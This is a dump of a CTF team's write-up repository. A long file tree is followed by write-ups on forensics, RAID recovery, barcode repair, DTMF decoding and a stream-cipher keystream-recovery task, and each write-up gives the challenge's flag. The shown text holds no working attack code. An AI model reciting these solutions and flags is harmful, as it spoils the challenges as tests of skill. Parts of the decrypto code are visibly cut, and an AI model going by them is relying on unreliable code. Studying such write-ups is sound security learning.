├── .gitattributes ├── 2019-09-14-rwctf ├── Advertisement │ └── README.md ├── CaiDanTi │ └── README.md ├── crawl box │ └── README.md ├── faX senDeR │ └── README.md └── hCorem │ └── README.md ├── 2019-11-30-CTFZone └── Emerald Rush │ └── README.md ├── 2019-12-20-justCTF └── Ugliest website │ └── README.md ├── 2020-02-01-HackTM ├── Obey the Rules │ └── README.md ├── Quack the Quackers │ └── README.md ├── baby_bear │ └── README.md ├── dragon_sleeps_at_night │ └── README.md ├── merry cemetery │ └── README.md ├── papa bear │ └── README.md ├── rr │ ├── README.md │ └── flag.jpg ├── rsa_is_easy_1 │ └── README.md ├── rsa_is_easy_2 │ └── README.md ├── shifty │ └── README.md ├── strange_pcap │ └── README.md └── twisty │ └── README.md ├── 2020-02-23-BSidesSF ├── README.md ├── barcoder │ ├── README.md │ ├── cancer.png │ └── challenge.png ├── config-me │ └── README.md ├── decrypto2 │ ├── README.md │ ├── decrypto.py │ └── flag.svg.enc ├── eavesdropper │ ├── README.md │ ├── eavesdropper.wav │ └── spectrogram.png ├── haystack │ ├── README.md │ ├── chaffing.py │ ├── chaffing.pyc │ ├── data.bin │ └── message.pcap ├── mpfrag │ ├── README.md │ ├── cloud_flag.jpg │ ├── flag_cut.jpg │ ├── test.mpg │ └── test.zip ├── ripc4 │ └── README.md └── toast │ ├── README.md │ ├── ToastDynamicFlag.java │ ├── bacon-final.dex │ └── toast-clicker.apk ├── 2020-03-01-AeroCTF ├── README.md ├── aerofloat │ └── README.md ├── drawing │ └── README.md ├── elderly │ ├── README.md │ ├── file.enc │ ├── file.hex │ └── main.pyc ├── magic │ ├── README.md │ ├── output.txt │ └── task.py ├── mental_beginning │ ├── Beginning.HEX │ ├── Cheme.png │ └── README.md ├── mental_orderlies │ ├── README.md │ └── Smth.HEX ├── navigation_journal │ └── README.md ├── password_keeper │ └── README.md ├── plane_market │ └── README.md ├── save_the_plane │ └── README.md ├── shell_me │ └── README.md └── ticket_storage │ └── README.md ├── 2020-03-07-zer0ptsCTF ├── README.md ├── babybof │ └── README.md ├── dirty-laundry │ ├── README.md │ ├── chall.py │ ├── commented_chall.py │ ├── output.txt │ └── solve.py ├── diylist │ └── README.md ├── hipwn │ └── README.md ├── hobbit │ ├── README.md │ ├── chall.hbt │ └── hobbit.ko ├── locked │ ├── README.md │ └── gesture.key ├── meowmow │ └── README.md ├── nibelung │ ├── README.md │ ├── fglg.py │ ├── server.py │ └── solver.py ├── protrude │ └── README.md ├── qr │ ├── README.md │ ├── chall │ ├── decoded.txt │ ├── encrypted.qr │ ├── key │ └── out.png ├── ror │ ├── README.md │ ├── chall.py │ └── chall.txt ├── strcmp │ ├── README.md │ └── easystrcmp ├── syscall │ └── README.md ├── vmlog │ ├── README.md │ ├── log.txt │ └── vm.py └── wysinwyg │ ├── README.md │ └── wysinwyg ├── 2020-03-29-VolgaCTF ├── README.md └── dotnetme │ ├── README.md │ ├── check_flag.png │ ├── cleaned_with_de4dot.png │ ├── cli.png │ ├── computeHash.png │ ├── congratulation.png │ ├── de4dot.png │ ├── debugger_internal_error.png │ ├── extracted_key.png │ ├── hash_check.PNG │ ├── magic.gif │ ├── no_invalid_format.png │ ├── obfuscated.png │ ├── obfuscated2.png │ ├── sources │ ├── FlagChecker.cs │ ├── Program.cs │ └── Utils.cs │ ├── task.png │ ├── unknown_string.png │ └── vs.png ├── 2020-04-04-MidnightSun-quals ├── README.md ├── masterpiece │ ├── Mario Paint (Japan, USA).000 │ ├── README.md │ ├── flag.png │ └── masterpiece.000 └── verifier2 │ └── README.md ├── 2020-04-12-ByteBanditsCTF ├── README.md ├── aesy │ └── README.md ├── autobot │ ├── README.md │ └── payload.txt ├── baby_rust │ ├── README.md │ └── babyrust ├── ecb │ └── README.md ├── meet │ ├── README.md │ ├── meet.py │ └── solver.py ├── notes-app │ ├── README.md │ ├── images │ │ └── main.png │ └── sources │ │ ├── Dockerfile │ │ ├── config.py │ │ ├── docker-compose.yml │ │ ├── mynotes │ │ ├── __init__.py │ │ ├── main.py │ │ ├── models.py │ │ ├── templates │ │ │ ├── index.html │ │ │ ├── layout.html │ │ │ ├── login.html │ │ │ ├── profile.html │ │ │ ├── register.html │ │ │ ├── status.html │ │ │ └── visit_link.html │ │ └── visit_link.py │ │ ├── requirements.txt │ │ └── server.py ├── oldschool │ ├── 1.jpg │ └── README.md ├── rsyay │ ├── README.md │ └── solver.py ├── secure_des │ ├── README.md │ ├── securedes.py │ └── solver.py ├── string_equals │ ├── README.md │ ├── a │ │ ├── 0 │ │ ├── 1 │ │ ├── 2 │ │ ├── 3 │ │ ├── 4 │ │ ├── 5 │ │ ├── 6 │ │ ├── 7 │ │ ├── 8 │ │ ├── 9 │ │ ├── 10 │ │ ├── 11 │ │ ├── 12 │ │ ├── 13 │ │ ├── 14 │ │ ├── 15 │ │ ├── 16 │ │ ├── 17 │ │ ├── 18 │ │ └── 19 │ ├── chall.py │ ├── hashes.txt │ └── solver.py └── wooter │ └── README.md ├── 2020-04-17-PlaidCTF ├── README.md ├── dyrpto │ ├── README.md │ ├── generate_problem.py │ ├── message.proto │ ├── message_pb2.py │ └── output.txt └── sidhe │ ├── README.md │ ├── client.sage │ └── server.sage ├── 2020-04-25-IJCTF ├── README.md ├── klepto │ ├── README.md │ ├── enc │ └── klepto.py ├── nibiru │ ├── Nibiru.pdf │ └── README.md ├── plaintimage │ ├── README.md │ ├── flag.jpg.enc │ └── out.jpg ├── rev0 │ └── README.md └── space │ └── README.md ├── 2020-05-09-SpamAndFlags ├── README.md ├── ots │ ├── README.md │ ├── code.py │ └── ots.py ├── pwnzi_1 │ ├── README.md │ └── monies.png ├── pwnzi_2 │ └── README.md └── shor │ └── README.md ├── 2020-05-18-DefconQualification ├── README.md └── babymaze │ ├── README.md │ ├── files │ └── BabyMaze │ └── screenshots │ ├── connection-refused.png │ ├── flag.png │ └── maze.png ├── 2020-06-05-DefenitCTF ├── README.md ├── base64 │ └── README.md ├── catchmouse │ └── README.md ├── child_encrypter │ └── README.md ├── error │ └── README.md ├── fortune_cookie │ └── README.md ├── mixmix │ ├── README.md │ ├── mixmix │ ├── out.txt │ └── outbits.txt ├── moms_touch │ ├── README.md │ └── momsTouch ├── spn │ ├── README.md │ ├── SPN.py │ └── solver.py └── warmup │ └── README.md ├── 2020-07-03-ASIS-quals ├── README.md ├── baby_rsa │ ├── README.md │ ├── baby_rsa.py │ └── output.txt ├── crazy │ ├── README.md │ ├── crazy.py │ └── output.txt ├── dead_drop │ ├── README.md │ ├── dead_drop_1.py │ ├── dead_drop_2.py │ ├── flag1.enc │ ├── flag2.enc │ └── solver.sage ├── kaffee │ ├── COB │ ├── README.md │ └── flag.enc ├── latte │ ├── README.md │ ├── flag.latte │ └── latte ├── mgr │ ├── README.md │ ├── flag.enc │ └── mgr ├── titanic │ └── README.md └── tripolar │ ├── README.md │ ├── flag.enc │ ├── solver.sage │ └── tripolar.py ├── 2020-07-25-CybricsCTF ├── README.md ├── baby_re │ ├── README.md │ └── babyrev.xml ├── catgirl │ ├── README.md │ ├── do_not_pet_me.exe │ ├── final.py │ ├── flag.enc │ └── main.py ├── gcloud │ ├── README.md │ ├── gcloud.pcap │ └── result.jpg ├── gif2png │ ├── README.md │ └── main.py ├── hellish_re │ ├── README.md │ └── hellishreverse.tar.gz ├── hunt │ ├── README.md │ └── captcha.png ├── invitation │ ├── README.md │ └── broken_invitation.pdf ├── krevedka │ └── README.md ├── polyglot │ ├── README.md │ ├── code.c │ ├── code2.cpp │ └── code3.py ├── serial │ ├── 1.js │ └── README.md ├── too_secure │ ├── README.md │ └── too_secure.pdf └── xcorp │ ├── README.md │ ├── net10.exe │ └── xcorp.pcap ├── 2020-07-31-InCTF ├── README.md ├── archride │ ├── README.md │ └── surprise ├── backflip │ ├── README.md │ └── bakflips.py ├── coins │ └── README.md ├── dlpoly │ ├── README.md │ └── out.txt ├── maze │ ├── README.md │ └── output.gb ├── re_warmup │ ├── README.md │ └── warmup ├── rsapoly │ ├── README.md │ └── out.txt └── video │ ├── README.md │ ├── out.gif │ └── upload_file.php ├── 2020-08-24-GoogleCTF ├── README.md ├── android │ ├── README.md │ ├── activity.smali │ ├── listener.smali │ └── reverse.apk ├── basics │ ├── README.md │ ├── check.sv │ └── main.cpp ├── beginner │ ├── README.md │ └── beginner ├── chunk │ ├── README.md │ ├── challenge.py │ └── output.txt ├── sharky │ ├── README.md │ ├── challenge.py │ └── sha256.py └── yafm │ ├── README.md │ └── server.py ├── 2020-09-25-BalCCon ├── Katherine │ ├── README.md │ └── katherine.py ├── README.md ├── RaKeeJaPassRPC │ ├── README.md │ ├── client.py │ └── server.py ├── cryptosh │ ├── README.md │ └── cryptsh.py ├── do_u_have_knowledge │ ├── README.md │ └── server.py ├── heapmailer │ └── README.md ├── iot_grill │ └── README.md ├── mindgames_1336 │ └── README.md ├── mindgames_1337 │ └── README.md ├── mindgames_1338 │ └── README.md ├── ragequit │ └── README.md ├── shallweplayagame │ └── README.md └── turboblaise │ └── README.md ├── 2020-10-03-TastelessCTF ├── 711 │ ├── README.md │ ├── challenge.7z │ └── challenge2.7z ├── 712 │ ├── README.md │ ├── fixed.png │ └── raw_out.png ├── BabypadV2 │ ├── README.md │ └── chall.py ├── README.md └── petition │ ├── Challenge.java │ └── README.md ├── 2020-11-14-BalsnCTF ├── README.md ├── babyrev │ └── README.md ├── l5d │ └── README.md ├── last_bitcon │ └── README.md ├── patience2 │ └── README.md ├── the_woven_web │ └── README.md ├── tpc │ ├── README.md │ └── files │ │ ├── challenge.png │ │ └── object-containing-flag.tar.gz ├── transformer │ └── README.md ├── welcome2balsnctf │ ├── README.md │ └── files │ │ └── upload_95073691eadf0992593e82c3b59faeea.png └── windows_xp_media_player │ └── README.md ├── 2020-11-22-DragonCTF ├── README.md ├── apparmor2 │ └── README.md ├── babyshell │ └── README.md ├── bitflip1 │ ├── README.md │ ├── stage1.py │ └── task.py ├── bitflip3 │ ├── README.md │ ├── stage3.py │ └── task.py ├── coolname_checker │ └── README.md ├── harmony_chat │ ├── README.md │ └── files │ │ ├── harmony.zip │ │ └── main.png ├── heap-hop │ └── README.md ├── lookup_the_flag │ └── README.md ├── retrozeit │ ├── README.md │ └── retrozeit └── scratchpad │ ├── README.md │ └── files │ ├── flag.png │ ├── home.png │ ├── img-src.png │ ├── main.png │ └── sources │ ├── package.json │ ├── routes │ ├── index.ts │ └── notes.ts │ ├── schema.sql │ ├── serve.ts │ ├── setup.ts │ ├── static │ ├── bootstrap.min.css │ └── star.svg │ ├── utils.ts │ ├── views │ ├── edit.pug │ ├── error.pug │ ├── index.pug │ ├── layout.pug │ ├── login.pug │ ├── new.pug │ ├── note.pug │ ├── notes.pug │ └── register.pug │ ├── watch.ts │ └── yarn.lock ├── 2020-12-05-DefCampCTF ├── README.md ├── alien │ └── README.md ├── basiccoms │ └── README.md ├── bro64 │ └── README.md ├── broken │ └── README.md ├── hunting │ └── README.md ├── inorder │ ├── README.md │ └── inorder.py ├── modern │ ├── README.md │ ├── main.py │ └── modern-login.apk ├── notor │ ├── README.md │ └── shelladsasdadsasd.html.php ├── pros │ └── README.md ├── secret │ ├── README.md │ └── rev_secret_secret ├── spy │ ├── README.md │ ├── app-release.apk.zip │ └── coordinates_can_be_found_here.jpg ├── stripped │ ├── README.md │ └── rev_strippedGo_strippedGO.out ├── stug │ ├── README.md │ └── stug.jpg ├── team │ └── README.md ├── xor │ ├── README.md │ └── xor.py └── yopass │ ├── README.md │ └── yopass ├── 2021-01-16-BambooFox ├── README.md ├── babystack │ └── README.md ├── flag_checker │ └── README.md ├── hoc │ └── README.md ├── ngsteg │ └── README.md ├── turing │ └── README.md └── wxpage │ └── README.md ├── 2021-03-13-UTCTF ├── README.md ├── a_bit │ ├── README.md │ ├── bit_weird.py │ └── bit_weird_msg.txt ├── aeg │ ├── README.md │ └── angr.png ├── bacon │ └── README.md ├── cbc │ └── README.md ├── delete │ ├── README.md │ └── flash_drive.img.gz ├── emoji │ └── README.md ├── farmer │ ├── README.md │ └── output.txt ├── functional │ └── README.md ├── illegal │ └── README.md ├── linker │ └── README.md ├── messy_utf8 │ └── README.md ├── osint2 │ └── README.md ├── pyjail │ └── README.md ├── radio │ ├── README.md │ ├── demodulate.png │ └── off.iq ├── resolve │ └── README.md ├── sandwich │ ├── README.md │ ├── flag.jpg │ └── secret.pdf ├── sleeves │ └── README.md ├── small_p │ └── README.md ├── smol_data │ ├── README.md │ └── anomaly_detect.zip ├── various │ └── README.md └── zkp │ └── README.md ├── 2021-03-27-VolgaCTFQuals ├── README.md ├── inception │ ├── 1st_level.png │ ├── README.md │ ├── base26.txt │ ├── egypt.pdf │ ├── lsb.zip │ └── morse.txt ├── knock │ ├── README.md │ ├── knockd.pcap │ └── task.py └── streams │ ├── README.md │ ├── stream.pcap │ └── stream2.pcap ├── 2021-10-23-ASIS-quals ├── README.md ├── crypto_warmup │ ├── README.md │ ├── Warmup.py │ └── output.txt ├── factory │ ├── README.md │ └── factory.pdf ├── madras │ ├── Madras.py │ ├── README.md │ └── output.txt ├── pinhole │ ├── README.md │ ├── output.sage │ ├── output.txt │ └── pinhole.sage └── spiritual │ └── README.md ├── 2023-01-13-idekctf ├── README.md ├── cleithrophobia │ └── README.md ├── coroutine │ └── README.md ├── minkymomo │ └── README.md ├── relativity │ └── README.md ├── sofire │ └── README.md ├── sprinter │ └── README.md ├── typop │ └── README.md └── weep │ └── README.md ├── 2023-06-21-p4ctf-finals ├── README.md ├── aes_observed │ └── README.md ├── ancient │ └── README.md ├── narco_chat │ ├── README.md │ └── client.pyc ├── pallas │ └── README.md ├── pepega │ ├── README.md │ └── server.go ├── rsa_kebab │ └── README.md └── scoundrelike │ ├── README.md │ └── scoundrelike ├── 2023-11-04-lakeCTF-quals ├── README.md ├── dive │ ├── README.md │ └── dive ├── ecc_key_sharer │ ├── README.md │ └── keysharer.py ├── funtran │ ├── README.md │ ├── arrayops.f90 │ └── funtran ├── random_rsa │ ├── README.md │ └── randomrsa.py ├── vigenere_cbc │ ├── README.md │ └── vigenere.py └── vimjail │ ├── README.md │ └── chall_vimrc1 ├── 2024-01-06-IrisCTF ├── README.md ├── asi │ └── README.md ├── babycharge │ └── README.md ├── dhash │ └── README.md ├── integralcommunication │ └── README.md ├── memory │ └── README.md └── seriousbanking │ └── README.md ├── 2024-01-27-RealWorldCTF ├── README.md ├── minioday │ └── README.md ├── partyhouse │ └── README.md └── truthplain │ └── README.md ├── 2024-03-15-KalmarCTF └── msrable │ ├── README.md │ └── exploit │ ├── Makefile │ ├── pwn.S │ └── solve.c ├── 2024-06-30-UIUCTF ├── README.md └── picoify │ ├── README.md │ ├── meme75.jpg │ ├── memescore.jpg │ └── pic16.jpg └── 2025-01-05-IrisCTF ├── README.md └── spicy_messaging_sinusoids ├── README.md ├── inspectrum.png ├── urh1.png └── urh2.png /.gitattributes: -------------------------------------------------------------------------------- 1 | # ASIS quals 2021, Pinhole: 7M of matrix 2 | 2021-10-23-ASIS-quals/pinhole/*.sage linguist-vendored 3 | -------------------------------------------------------------------------------- /2019-09-14-rwctf/Advertisement/README.md: -------------------------------------------------------------------------------- 1 | # Advertisement - Real World CTF 2019 Quals 2 | 3 | Advertisement is a warmup task. The goal is to find the name of a product from 4 | Chaitin, the organisers of the Real World CTF. 5 | 6 | The english version of [Chaitin's website](https://www.chaitin.cn/en/]) mentions 7 | the following products: 8 | - SafeLine 9 | - D-Sensor 10 | - X-Ray 11 | - CloudWalker 12 | 13 | **Flag**: `rwctf{XRay}` 14 | -------------------------------------------------------------------------------- /2020-02-01-HackTM/rr/README.md: -------------------------------------------------------------------------------- 1 | # RR (for, 298p, 67 solved) 2 | 3 | In this challenge we get a RAID-5 images, with 2 valid and 1 broken image. 4 | Since it's RAID-5 we can recover the missing parts of the data, because for given block the drive either contains real data, or XOR of data from two other drives. 5 | 6 | This means that we can XOR the two images we have, and then rebuild the disk from those 3 images. 7 | We just used the tool `OSForensics` for the RAID rebuilding. 8 | 9 | We only had to guess the size of the block, but this we can estimate by looking at the consecutive data blocks in the images we have. 10 | There were some long text-files on the disk, and they were a good target. 11 | We can find some long text block and then lots of nullbytes, and this tells us the size is 65536 bytes. 12 | 13 | With this we can rebuild the full disk image. 14 | 15 | In the disk we can find that there is `Flag.jpg` somewhere there. 16 | We can use binwalk, or just carve it out with hexeditor looking for `JFIF` magic: 17 | 18 | ![](flag.jpg) 19 | 20 | Then we need to re-type a very long flag: `HackTM{1bf965b6e23e5d2cb4bdfa67b6d8b0940b5a23e98b8593bb96a4261fb8a1f66a}` 21 | -------------------------------------------------------------------------------- /2020-02-01-HackTM/rr/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-01-HackTM/rr/flag.jpg -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/README.md: -------------------------------------------------------------------------------- 1 | # BSidesSF CTF 2020 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Barcoder (forensics/101)](barcoder) 8 | * [Decrypto2 (crypto)](decrypto2) 9 | * [Eavesdropper (forensics)](eavesdropper) 10 | * [haystack (crypto/forensics/re)](haystack) 11 | * [mpfrag (forensics)](mpfrag) 12 | * [toast clicker 1/2/3 (mobile)](toast) 13 | * [config-me (re)](config-me) 14 | * [ripc4 (pwn/crypto)](ripc4) 15 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/barcoder/README.md: -------------------------------------------------------------------------------- 1 | # barcoder (forensics/101, 51p, 37 solved) 2 | 3 | Zero technicall challenge here, just tedious manual work. 4 | We get a picture: 5 | 6 | ![](challenge.png) 7 | 8 | The goal is to recover the barcode and decode it. 9 | There is nothing special really, we cut out the barcode, used stegsolve to get just one color channel to get rid of all the surroudings, and then simply painted back the missing lines. 10 | For each line there is at least a fraction left, so it's always clear how thick to make it. 11 | Finally we arrive to: 12 | 13 | ![](cancer.png) 14 | 15 | And ZXing gives us the flag: `CTF{way_too_common}` 16 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/barcoder/cancer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/barcoder/cancer.png -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/barcoder/challenge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/barcoder/challenge.png -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/config-me/README.md: -------------------------------------------------------------------------------- 1 | # config-me - BSidesSF 2020 CTF (reverse, 472p, 4 solved) 2 | ## Introduction 3 | 4 | config-me is a reversing task. It is also in the `101` category, hinting that it 5 | should be quite easy. 6 | 7 | This task contains two files: `config-me` an ELF binary written in Rust, and 8 | `config-me.conf` that contains a name, a password, a comment, a conference title 9 | and the flag. 10 | 11 | The password and flag fields are encrypted: 12 | 13 | ``` 14 | password: E$0d6b731d24127ad34e76a78133c91e59f13ab12eaa8dc0ad99e10c71 15 | flag: E$af7ac775b3716f6d6ae96fdb6080ef41f4918e0b9f2837b82105b5da39 16 | ``` 17 | 18 | ## Reverse engineering 19 | 20 | The best way to reverse a Rust binary is: you don't. 21 | 22 | 23 | ## Dynamic analysis 24 | 25 | The `config-me` binary reads the configuration from `config-me.conf`. It then 26 | displays `Welcome back, Ron [...]`, with Ron being the content of the `name` 27 | field from the configuration. 28 | 29 | The binary can be used to add/delete a key and save/load a configuration file. A 30 | key can be encrypted, and look like the encrypted field seen above. 31 | 32 | By changing the configuration file and setting the `name` field to an encrypted 33 | value, it will be decrypted and printed. Setting the `name` field to the 34 | encrypted flag will reveal the flag: 35 | 36 | ``` 37 | Welcome back, CTF{my_rust_is_rusty}! Your config file currently has 5 entries. What would you like to do? 38 | ``` 39 | 40 | **Flag**: `CTF{my_rust_is_rusty}` 41 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/decrypto2/README.md: -------------------------------------------------------------------------------- 1 | # Decrypto-2 (crypto, 65p, 26 solved) 2 | 3 | In the challenge we get an [encryption algorithm](decrypto.py) and [encrypted svg](flag.svg.enc). 4 | 5 | The algorithm is a simple stream cipher. 6 | The keystream is generated using: 7 | 8 | ```python 9 | def __init__(self, key): 10 | super(HashCrypto, self).__init__(key) 11 | self._blk = self.key 12 | self._blkid = 0 13 | 14 | def _extend_buf(self): 15 | self._blk = hashlib.sha256( 16 | self._blk + struct.pack('` 29 | 30 | Once we have that it's trivial to recover the flag: 31 | 32 | ```python 33 | data = open("flag.svg.enc", 'rb').read() 34 | prefix = '' 35 | keystream = xor_string(data, prefix[:32]) 36 | crypter = HashCrypto(keystream) 37 | # move keystream generation one block further 38 | crypter._blkid = 1 39 | crypter._blk = keystream 40 | crypter._buf = keystream 41 | open("out.svg", 'wb').write(''.join(crypter.encrypt(data))) 42 | ``` 43 | 44 | And we get `CTF{but_even_I_couldnt_break_IT}` 45 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/decrypto2/decrypto.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import struct 3 | import sys 4 | 5 | 6 | class Crypto: 7 | 8 | def __init__(self, key): 9 | if not isinstance(key, bytes): 10 | raise TypeError('key must be of type bytes!') 11 | self.key = key 12 | self._buf = bytes() 13 | self._out = open("/dev/stdout", "wb") 14 | 15 | def _extend_buf(self): 16 | self._buf += self.key 17 | 18 | def get_bytes(self, nbytes): 19 | while len(self._buf) < nbytes: 20 | self._extend_buf() 21 | ret, self._buf = self._buf[:nbytes], self._buf[nbytes:] 22 | return ret 23 | 24 | def encrypt(self, buf): 25 | if not isinstance(buf, bytes): 26 | raise TypeError('buf must be of type bytes!') 27 | stream = self.get_bytes(len(buf)) 28 | return bytes(a ^ b for a, b in zip(buf, stream)) 29 | 30 | def set_outfile(self, fname): 31 | self._out = open(fname, "wb") 32 | 33 | def encrypt_file(self, fname): 34 | buf = open(fname, "rb").read() 35 | self._out.write(self.encrypt(buf)) 36 | 37 | 38 | class HashCrypto(Crypto): 39 | 40 | def __init__(self, *args, **kwargs): 41 | super().__init__(*args, **kwargs) 42 | self._blk = self.key 43 | self._blkid = 0 44 | 45 | def _extend_buf(self): 46 | self._blk = hashlib.sha256( 47 | self._blk + struct.pack(' [outfile]" % sys.argv[0]) 55 | return 56 | argv.pop(0) 57 | key = argv.pop(0) 58 | inf = argv.pop(0) 59 | crypter = HashCrypto(key.encode("utf-8")) 60 | if sys.argv: 61 | crypter.set_outfile(argv.pop(0)) 62 | crypter.encrypt_file(inf) 63 | 64 | 65 | if __name__ == '__main__': 66 | main(sys.argv) 67 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/decrypto2/flag.svg.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/decrypto2/flag.svg.enc -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/eavesdropper/README.md: -------------------------------------------------------------------------------- 1 | # Eavesdropper (forensics, 108p, 20 solved) 2 | 3 | In the challenge we get a [wav recording](eavesdropper.wav) of a phonecall where someone uses dial-tones to input secret code. 4 | It's rather classic forensics challenge, so we simply load the file into Audacity, and run DTMF decoder plugin. 5 | Interestingly the decoder had some issues with properly figuring out the length of the signal, outputting multiple values instead of one, but we can simply select one digit at a time. 6 | 7 | If someone is interested in doing this `the hard way` it's also pretty simple. 8 | We can display the wav in Audacity as `spectrogram` and select the frequency ranges to match DTMF codes and we can see: 9 | 10 | ![](spectrogram.png) 11 | 12 | Either way we can easily read the code: `665645` 13 | 14 | Now we just need to call the given number, go bankrupt on international calls and get the flag `ctf{dtmf_is_awesome}` 15 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/eavesdropper/eavesdropper.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/eavesdropper/eavesdropper.wav -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/eavesdropper/spectrogram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/eavesdropper/spectrogram.png -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/haystack/chaffing.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/haystack/chaffing.pyc -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/haystack/data.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/haystack/data.bin -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/haystack/message.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/haystack/message.pcap -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/mpfrag/README.md: -------------------------------------------------------------------------------- 1 | # Mpfrag (forensics, 423p, 7 solved) 2 | 3 | A rather confusing forensics task. 4 | I'm under the impression we solved this somehow not the intended way... 5 | 6 | We get a file `disk.bin: Linux rev 1.0 ext2 filesystem data, UUID=07a34ef3-2282-447d-b2fd-1ade0b320153 (large files)` 7 | 8 | By running binwalk on this we get an [encrypted zip](test.zip) which contains file `cloud_flag.jpg`. 9 | Seems like a good starting point. 10 | 11 | The challenge name and description says something about MPEG so we looked for mpg markers in the given disk image, and there were some, so we carved this out with hexeditor and got a [video](test.mpg). 12 | 13 | The video clearly shows a password of some kind: `SF-G0lden-Gl0w-1848`. 14 | And this password actually works almost fine for the ZIP. 15 | 16 | There are some errors but we managed to get the [output jpg](cloud_flag.jpg). 17 | The file seems to be broken somehow (perhaps the zip was not carved properly?) but we managed to open it anyway in some fancy image software. 18 | 19 | It was only displaying the top half of the flag: 20 | ![flag\_cut.jpg](flag_cut.jpg) 21 | 22 | With our unprecedented guessing skills we managed to figure out the flag: `CTF{bridge_ext2_gaps}` 23 | 24 | -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/mpfrag/cloud_flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/cloud_flag.jpg -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/mpfrag/flag_cut.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/flag_cut.jpg -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/mpfrag/test.mpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/test.mpg -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/mpfrag/test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/mpfrag/test.zip -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/toast/bacon-final.dex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/toast/bacon-final.dex -------------------------------------------------------------------------------- /2020-02-23-BSidesSF/toast/toast-clicker.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-02-23-BSidesSF/toast/toast-clicker.apk -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/README.md: -------------------------------------------------------------------------------- 1 | # Aero CTF 2020 2 | 3 | Team: XeR, SIben, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Drawings on the walls (forensics)](drawing) 8 | * [Elderly file (warmup/re)](elderly) 9 | * [Mental adventure: beginning (warmup/PIC)](mental_beginning) 10 | * [Mental adventure: call the orderlies (PIC)](mental_orderlies) 11 | * [Magic1 (crypto)](magic) 12 | * [Aerofloat (pwn)](aerofloat) 13 | * [Shell Me If You Can (pwn/re)](shell_me) 14 | * [Ticket Storage (pwn/re)](ticket_storage) 15 | * [Plane Market (pwn)](plane_market) 16 | * [Password Keeper (pwn)](password_keeper) 17 | * [Navigation Journal (pwn)](navigation_journal) 18 | * [Save The Plane (warmup)](save_the_plane) 19 | -------------------------------------------------------------------------------- /2020-03-01-AeroCTF/drawing/README.md: -------------------------------------------------------------------------------- 1 | # Drawings on the walls (forensics, 100p, 113 solved) 2 | 3 | A classic guessy forensics challenge. 4 | We get a ~2GB memdump of windows machine and we're supposed to find flags there. 5 | 6 | You can try to use volatility but it's not really useful here. 7 | It boils down to strings+grep skills. 8 | 9 | Looking for `Aero{` in the memdump shows some fake flags, but when we switch to looking for unicode strings we hit unicode string `A.e.r.o.{.g.0.0.d.j.0.b._.y`. 10 | That's not a whole flag, but now we can look around for `g00d` and we find `g00dj0b_y..0u_f1n4..11y_g07_7h3_wh0l3_fl4g` 11 | 12 | We can merge this and submit `Aero{g00dj0b_y0u_f1n411y_g07_7h3_wh0l3_fl4g}` 13 | 14 | In the meantime we found also an interesting string `Here is AEORCTF keepass master key: 